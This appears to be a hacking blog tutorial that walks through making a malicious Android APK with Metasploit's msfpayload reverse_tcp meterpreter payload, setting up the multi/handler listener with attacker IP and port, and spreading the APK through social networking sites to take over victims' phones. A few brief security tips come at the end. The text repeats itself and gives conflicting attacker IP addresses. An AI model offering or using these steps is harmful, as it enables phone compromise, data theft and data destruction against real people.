Hacking Android Smartphone Tutorial using Metasploit
what is your Requirements:
1. first you need Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. obiously you need a Android smartphone (we use LG android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
step:1). first of all simply Open terminal if you don't know how simply press CTRL + ALT + T
step:2). After that We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
here we allready describe what is attacker IP address and here we considered ip as 182.158.18.67, if you don't understand please see beelow picture
step:3) .This is Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above.simply goto console if you don't know how to go to consol window simply Type msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
step:4) .after doing this The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
step:5) . Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet and social networking sites are the good place for distribution )
step:6) . Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
step:7).what its mean , It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone he can steal all information of victim even sometime destroy all sencitive data of mobile
security tips:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.
3.always turn of unknown scource installation feature ,every phone have this feature in security tab under mobile setting
1. first you need Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. obiously you need a Android smartphone (we use LG android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
step:1). first of all simply Open terminal if you don't know how simply press CTRL + ALT + T
step:2). After that We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
here we allready describe what is attacker IP address and here we considered ip as 182.158.18.67, if you don't understand please see beelow picture
step:3) .This is Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above.simply goto console if you don't know how to go to consol window simply Type msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
step:4) .after doing this The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
step:5) . Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet and social networking sites are the good place for distribution )
step:6) . Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
security tips:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.
3.always turn of unknown scource installation feature ,every phone have this feature in security tab under mobile setting
No comments:
Post a Comment